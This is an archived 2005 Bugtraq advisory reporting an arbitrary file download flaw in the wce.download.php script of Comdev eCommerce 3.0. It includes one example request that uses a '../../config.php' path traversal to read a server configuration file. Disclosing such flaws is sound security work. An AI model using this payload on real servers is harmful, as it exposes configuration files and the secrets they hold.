Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Comdev eCommerce wce.download.php Download Vulnerability
From: none () none com
Date: 5 Aug 2005 01:55:55 -0000
Class:  Input Validation Error  
Vulnerable: Comdev Comdev eCommerce 3.0 

The wce.download.php script (present in two locations) can be passed a "download" http request parameter to download an 
arbitrary file on the vulnerable server.

Example:

http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php

  By Date           By Thread  

Current thread:
  • Comdev eCommerce wce.download.php Download Vulnerability none (Aug 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]